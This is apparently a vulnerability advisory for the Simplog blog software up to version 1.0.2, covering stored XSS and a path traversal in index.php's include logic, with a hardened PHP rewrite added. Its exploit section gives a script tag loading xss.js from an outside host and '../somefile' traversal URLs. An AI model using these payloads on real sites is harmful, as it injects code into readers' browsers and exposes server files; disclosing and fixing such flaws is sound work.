
Simplog <= 1.0.2 Vulnerabilities



ORIGINAL SOURCE: http://notlegal.ws/simplogsploit.txt

??? summary
        software: simplog
        vendors website: http://daverave.64digits.com/home.php?page=simplog
        versions: <= 1.0.2
        class: remote
        status: unpatched
        exploit: available
        solution: not available
        discovered by: retard and jim
        risk level: medium

??? description
        Simplog does not sanitise blog posts, so any user who can post
        is able to insert HTML (including script) into a post, which is
        then rendered to every reader: a stored XSS vulnerability. In
        addition, the application builds include paths directly from a
        request (global) variable, so a user can make it include .txt
        files other than the intended target by supplying a path of
        their own.
        
        in index.php (the vulnerable dispatch code, unchanged in behaviour,
        with comments added to mark where the problem is):
        $act = $_GET['act'];          // attacker-controlled request parameter
        if ($act == '')
        {
            include("blog.txt");
        }
        else
        {
            include("act/$act.txt");  // $act goes into the include path unfiltered
        }
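        The following is an added example of how the dispatch above could
        be hardened; it is not Simplog's own code and no patch from the
        vendor exists. Only $_GET['act'] and the act/*.txt layout come from
        the advisory; the allowed action names, the function names and the
        use of a blog-post rendering helper are assumptions made for the
        illustration.

```php
<?php
// Added example, not Simplog's code: a hardened version of the index.php
// dispatch from the advisory. Action names below are assumed.

// Only these page actions may ever be included. Because the request value
// is compared against a fixed list, "../" sequences, absolute paths and
// similar tricks can never reach include().
const ALLOWED_ACTS = ['blog', 'archive', 'about'];  // assumed action names

// Map the request parameter to a file under act/, or to the default page.
function resolve_act(string $act): string
{
    if ($act === '' || !in_array($act, ALLOWED_ACTS, true)) {
        // Empty or unknown action: serve the default page instead of
        // building a path from attacker-controlled input.
        return __DIR__ . '/blog.txt';
    }

    // Defence in depth: even for an allowed name, confirm the resolved
    // file really lives inside act/ before including it.
    $base = realpath(__DIR__ . '/act');
    $path = realpath(__DIR__ . '/act/' . $act . '.txt');
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return __DIR__ . '/blog.txt';
    }
    return $path;
}

// Encode a blog post for output so that any markup a user typed into the
// post is displayed literally rather than interpreted by the browser.
// This is what the advisory means by "sanitising" posts.
function render_post(string $post): string
{
    return htmlspecialchars($post, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

$act = isset($_GET['act']) ? (string) $_GET['act'] : '';
include(resolve_act($act));
```

        With this version a request such as act=../somefile is rejected by
        the allowlist and falls back to blog.txt, and a post containing a
        <script> tag is shown as text rather than executed, provided every
        place that prints a post goes through render_post().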

??? exploit(s)
        xss:
        make any of your blog posts contain a script like below
        <SCRIPT SRC=http://notlegal.ws/xss.js></SCRIPT>

        directory traversal:
        http://example.com/index.php?act=blog&blogid=../somefile
        http://example.com/index.php?act=../somefile

??? credit
        author(s): retard and jim
        email: retard@xxxxxxxxxx